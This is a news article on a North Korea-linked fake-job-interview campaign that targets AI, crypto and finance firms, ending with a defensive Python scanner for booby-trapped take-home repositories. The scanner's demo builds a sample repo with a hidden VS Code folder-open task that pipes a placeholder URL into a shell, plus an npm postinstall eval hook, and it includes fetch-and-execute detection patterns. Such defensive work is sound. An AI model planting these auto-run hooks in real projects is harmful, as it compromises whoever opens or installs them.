Job interview turns out to be a North Korean hacker trap! PurpleBravo has targeted over 3,100 IP addresses, with AI and cryptocurrency companies the biggest targets.
Threat groups linked to North Korea have launched a new wave of intrusions that use fake job interviews and technical recruitment processes to get into AI, cryptocurrency, and financial services companies worldwide. More than 3,100 IP addresses have been affected, a sign that the operation is growing in both scale and sophistication.
According to research from Insikt Group, the threat intelligence division of Recorded Future, the campaign is run by a group Insikt tracks as PurpleBravo. The group is assessed to be associated with North Korea's cyber units and has been tied to multiple cryptocurrency thefts over the past year, with illicit gains the report puts in the billions of dollars.
Fake interviews, real attacks: job application processes become infiltration gateways
Researchers describe PurpleBravo's method as "Contagious Interview": the operators pose as recruiters from tech or crypto companies and proactively contact engineers and developers with invitations to technical interviews.
As part of the interview, candidates are asked to review code, clone a GitHub repository, or complete a small development task. These ordinary-looking exercises carry hidden malicious code. Once it runs on a work machine, the attackers gain a foothold on that host, and the damage is not limited to the candidate's own accounts: the compromised device can be used to move into the employer's internal network.
Attacks span multiple regions, with tech and finance as primary targets
Insikt Group reports that at least 3,136 IP addresses were targeted during the monitoring period, and more than 20 organizations were confirmed as victims, spread across South Asia, North America, Europe, the Middle East, and Central America.
The targeting favors industries that hold large volumes of data and move money frequently: AI research and development firms, cryptocurrency trading platforms, and financial service providers. That pattern indicates the objective goes beyond data theft to stealing assets outright or maintaining long-term access.
Multiple fake identities and malicious tools, tactics continuously evolving
Researchers also found that the operation uses multiple fake personas, often claiming to be based in Ukraine, and approaches job seekers through platforms such as GitHub, LinkedIn, and Upwork to appear legitimate. Behind the personas, cross-platform malware is used to steal browser credentials and cookies and to give the operators remote control of the victim's machine.
The researchers further warn that the group has begun distributing "modified" development artifacts, such as backdoored Visual Studio Code projects. Once a user marks such a project as trusted and opens it in the editor, commands embedded in the project configuration can run without any further action from the user.
Experts warn: vigilance needed in job and development processes
Security experts advise that, with remote work and online recruitment now the norm, attackers are actively weaponizing the job application process itself. Engineers and their employers should verify the authenticity of unsolicited recruitment invitations, coding tests, and project collaboration requests before acting on them. Unverified code should not be run on corporate devices; if a take-home task has to be executed, it belongs in an isolated, disposable environment so that a booby-trapped repository cannot become an organization-wide compromise.
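The cloned-repository and backdoored-VS-Code-project scenarios above share one practical countermeasure: before opening or installing an interview "take-home" project, inspect it for anything that executes automatically. The following Python script is an added example for this article, not code from Insikt Group, Recorded Future, or the page's authors. It scans a checkout for the generic auto-execution hooks a developer's tooling honours (a VS Code task marked to run on folder open, npm lifecycle scripts such as `postinstall`, install-time files like `setup.py` or `.envrc`) and flags fetch-and-execute or `eval` patterns in any text file. The sample repository it builds is constructed for the demonstration, and the URL and script names in it are placeholders, not indicators from the report.

```python
"""Pre-flight scan of a cloned "coding test" repository for auto-execution hooks.

Added example for this article; not code from Insikt Group, Recorded Future or
the page's authors. The checks target generic developer-tooling mechanisms that
run commands when a project is opened or installed. None of the strings below
are published PurpleBravo indicators.
"""
import json
import re
import tempfile
from pathlib import Path

# VS Code runs a task whose runOptions.runOn is "folderOpen" as soon as a
# trusted folder is opened; this is the mechanism behind a "backdoored project".
FOLDER_OPEN = "folderOpen"
# npm / yarn / pnpm execute these scripts during `npm install`.
NPM_LIFECYCLE = {"preinstall", "install", "postinstall", "prepare"}
# Files that run arbitrary code at install time (pip) or on directory entry (direnv).
INSTALL_TIME_FILES = ("setup.py", ".envrc")
# Fetch-and-execute, eval and base64-decode patterns that deserve a manual look.
SUSPICIOUS = re.compile(
    r"(?:curl|wget|Invoke-WebRequest|iwr)\b[^\n|]*\|\s*(?:sh|bash|zsh|python3?|node|powershell|pwsh)\b"
    r"|\beval\s*\("
    r"|base64\s+(?:-d|--decode)\b",
    re.IGNORECASE,
)
MAX_BYTES = 512 * 1024  # skip large assets and binaries


def _strip_comments(text):
    """tasks.json is JSON-with-comments; drop // line comments before parsing."""
    return re.sub(r"^\s*//.*$", "", text, flags=re.MULTILINE)


def scan_repo(root):
    """Return a list of human-readable findings for the checkout at `root`."""
    root = Path(root)
    findings = []

    tasks_file = root / ".vscode" / "tasks.json"
    if tasks_file.is_file():
        try:
            tasks = json.loads(_strip_comments(tasks_file.read_text(encoding="utf-8")))
        except json.JSONDecodeError:
            tasks = None
        if tasks is None:
            findings.append(".vscode/tasks.json: unparsable, inspect manually")
        else:
            for task in tasks.get("tasks", []):
                if task.get("runOptions", {}).get("runOn") == FOLDER_OPEN:
                    cmd = " ".join([task.get("command", ""), *task.get("args", [])]).strip()
                    findings.append(
                        f".vscode/tasks.json: task {task.get('label', '?')!r} runs on folder open: {cmd}"
                    )

    pkg_file = root / "package.json"
    if pkg_file.is_file():
        try:
            scripts = json.loads(pkg_file.read_text(encoding="utf-8")).get("scripts", {})
        except json.JSONDecodeError:
            scripts = {}
            findings.append("package.json: unparsable, inspect manually")
        for name, cmd in scripts.items():
            if name in NPM_LIFECYCLE:
                findings.append(f"package.json: lifecycle script {name!r} runs on install: {cmd}")

    for name in INSTALL_TIME_FILES:
        if (root / name).is_file():
            findings.append(f"{name}: executes code at install time or on directory entry, review it")

    # Content scan of every small text file outside .git, with line numbers.
    for path in root.rglob("*"):
        if not path.is_file() or ".git" in path.parts or path.stat().st_size > MAX_BYTES:
            continue
        try:
            text = path.read_text(encoding="utf-8")
        except (UnicodeDecodeError, OSError):
            continue
        for m in SUSPICIOUS.finditer(text):
            line_no = text.count("\n", 0, m.start()) + 1
            findings.append(f"{path.relative_to(root)}:{line_no}: suspicious pattern: {m.group(0).strip()}")
    return findings


def build_sample_repo(root, booby_trapped=True):
    """Write a constructed take-home project. With booby_trapped=True it carries a
    hidden VS Code folder-open task and an npm postinstall hook (placeholder URL,
    not a real indicator); otherwise it is a clean control."""
    root = Path(root)
    (root / "src").mkdir(parents=True, exist_ok=True)
    (root / "src" / "index.js").write_text("module.exports = (a, b) => a + b;\n", encoding="utf-8")
    scripts = {"test": "node test.js"}
    if booby_trapped:
        (root / ".vscode").mkdir(exist_ok=True)
        task = {
            "label": "setup",
            "type": "shell",
            "command": "curl -s http://example.invalid/s.sh | sh",  # constructed placeholder
            "runOptions": {"runOn": FOLDER_OPEN},
            "presentation": {"reveal": "never"},  # keeps the terminal hidden from the victim
        }
        (root / ".vscode" / "tasks.json").write_text(
            json.dumps({"version": "2.0.0", "tasks": [task]}, indent=2), encoding="utf-8"
        )
        scripts["postinstall"] = "node -e \"eval(require('fs').readFileSync('.cfg','utf8'))\""
    (root / "package.json").write_text(
        json.dumps({"name": "interview-task", "scripts": scripts}, indent=2), encoding="utf-8"
    )
    return root


def demo(booby_trapped=True):
    """Build the constructed repo in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_repo(build_sample_repo(tmp, booby_trapped))


if __name__ == "__main__":
    for line in demo():
        print(line)
    print("clean control findings:", demo(booby_trapped=False))
```

Run it as `python scan_repo.py` to see the constructed project flagged, or call `scan_repo("/path/to/checkout")` on a real clone before opening it in an editor or running `npm install`. The script is a triage aid, not a sandbox: a repository with no findings can still carry a payload in obfuscated or binary form, so the isolated-environment advice above still applies.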